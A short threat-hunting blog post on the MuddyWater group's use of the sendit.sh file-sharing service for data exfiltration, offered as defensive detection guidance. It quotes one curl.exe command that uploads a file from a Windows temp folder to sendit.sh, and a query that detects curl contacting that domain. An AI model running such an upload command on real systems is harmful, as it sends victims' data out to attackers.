392. MuddyWater Abuses Sendit for Data Exfiltration

Hello everyone!

I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002).

According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line:

curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh

As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL:

event_type: "dnsreqwin"

AND

dns_rname: "sendit.sh"

AND

proc_file_path: "curl.exe"

See you soon!

Comments

Popular posts from this blog

082. Huniting for Malicious Browser Extensions

033. Free Google Threat Intelligence Course

163. A Curious Case of Iediagcmd.exe Abuse